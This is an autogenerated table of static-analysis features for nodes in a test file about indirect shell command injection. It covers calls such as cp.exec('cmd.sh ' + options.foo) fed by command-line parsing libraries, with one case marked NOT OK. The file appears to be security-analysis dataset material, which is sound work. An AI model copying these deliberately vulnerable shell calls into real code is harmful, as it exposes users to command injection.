autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:18:107:51 | exceptional return of command ... itions) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:18:107:51 | exceptional return of command ... itions) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:18:107:51 | exceptional return of command ... itions) | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:18:107:51 | exceptional return of command ... itions) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:18:107:51 | exceptional return of command ... itions) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:34:107:50 | optionDefinitions | CalleeFlexibleAccessPath | commandLineArgs | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:34:107:50 | optionDefinitions | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:34:107:50 | optionDefinitions | calleeImports | command-line-args | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:34:107:50 | optionDefinitions | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:34:107:50 | optionDefinitions | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:34:107:50 | optionDefinitions | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:34:107:50 | optionDefinitions | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:107:34:107:50 | optionDefinitions | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:2:108:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:2:108:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:2:108:3 | cp | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:2:108:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:2:108:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:2:108:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:2:108:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:2:108:8 | cp.exec | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:2:108:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:2:108:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:2:108:33 | cp.exec ... ns.foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:2:108:33 | cp.exec ... ns.foo) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:2:108:33 | cp.exec ... ns.foo) | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:2:108:33 | cp.exec ... ns.foo) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:2:108:33 | cp.exec ... ns.foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:2:108:33 | exceptional return of cp.exec ... ns.foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:2:108:33 | exceptional return of cp.exec ... ns.foo) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:2:108:33 | exceptional return of cp.exec ... ns.foo) | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:2:108:33 | exceptional return of cp.exec ... ns.foo) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:2:108:33 | exceptional return of cp.exec ... ns.foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:5:108:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:5:108:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:5:108:8 | exec | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:5:108:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:5:108:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:10:108:18 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:10:108:18 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:10:108:18 | "cmd.sh " | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:10:108:18 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:10:108:18 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:10:108:18 | "cmd.sh " | stringConcatenatedWith | -endpoint- options.foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:10:108:32 | "cmd.sh ... ons.foo | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:10:108:32 | "cmd.sh ... ons.foo | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:10:108:32 | "cmd.sh ... ons.foo | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:10:108:32 | "cmd.sh ... ons.foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:10:108:32 | "cmd.sh ... ons.foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:10:108:32 | "cmd.sh ... ons.foo | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:10:108:32 | "cmd.sh ... ons.foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:10:108:32 | "cmd.sh ... ons.foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:10:108:32 | "cmd.sh ... ons.foo | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:22:108:28 | options | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:22:108:28 | options | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:22:108:28 | options | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:22:108:28 | options | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:22:108:28 | options | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:22:108:32 | options.foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:22:108:32 | options.foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:22:108:32 | options.foo | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:22:108:32 | options.foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:22:108:32 | options.foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:22:108:32 | options.foo | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:30:108:32 | foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:30:108:32 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:30:108:32 | foo | enclosingFunctionBody | commandLineArgs require command-line-args options commandLineArgs optionDefinitions cp exec cmd.sh options foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:30:108:32 | foo | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:108:30:108:32 | foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:1:117:2 | (functi ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:1:117:2 | (functi ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:1:117:2 | (functi ... T OK\\n}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:111:1 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:111:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:111:1 | cp | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:111:1 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:111:1 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:111:1 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:111:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:111:1 | require | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:111:1 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:111:1 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:111:1 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:111:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:111:1 | this | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:111:1 | this | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:111:1 | this | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:117:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:117:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:117:1 | 'arguments' object of anonymous function | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:117:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:117:1 | 'arguments' object of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:117:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:117:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:117:1 | exceptional return of anonymous function | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:117:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:117:1 | exceptional return of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:117:1 | functio ... OT OK\\n} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:117:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:117:1 | functio ... OT OK\\n} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:117:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:117:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:117:1 | return of anonymous function | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:117:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:111:2:117:1 | return of anonymous function | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:8:112:11 | meow | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:8:112:11 | meow | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:8:112:11 | meow | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:8:112:11 | meow | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:8:112:11 | meow | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:8:112:29 | meow | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:8:112:29 | meow | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:8:112:29 | meow | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:8:112:29 | meow | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:8:112:29 | meow | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:8:112:29 | meow = ... 'meow') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:8:112:29 | meow = ... 'meow') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:8:112:29 | meow = ... 'meow') | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:8:112:29 | meow = ... 'meow') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:8:112:29 | meow = ... 'meow') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:15:112:21 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:15:112:21 | require | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:15:112:21 | require | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:15:112:21 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:15:112:21 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:15:112:29 | exceptional return of require('meow') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:15:112:29 | exceptional return of require('meow') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:15:112:29 | exceptional return of require('meow') | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:15:112:29 | exceptional return of require('meow') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:15:112:29 | exceptional return of require('meow') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:15:112:29 | require('meow') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:15:112:29 | require('meow') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:15:112:29 | require('meow') | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:15:112:29 | require('meow') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:15:112:29 | require('meow') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:23:112:28 | 'meow' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:23:112:28 | 'meow' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:23:112:28 | 'meow' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:23:112:28 | 'meow' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:23:112:28 | 'meow' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:23:112:28 | 'meow' | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:23:112:28 | 'meow' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:112:23:112:28 | 'meow' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:8:114:10 | cli | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:8:114:10 | cli | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:8:114:10 | cli | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:8:114:10 | cli | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:8:114:10 | cli | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:8:114:52 | cli | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:8:114:52 | cli | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:8:114:52 | cli | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:8:114:52 | cli | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:8:114:52 | cli | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:8:114:52 | cli = m ... lags}}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:8:114:52 | cli = m ... lags}}) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:114:8:114:52 | cli = m ... lags}}) | enclosingFunctionBody | meow require meow cli meow helpstring flags flags cp exec cmd.sh cli 0 input 0 | +| 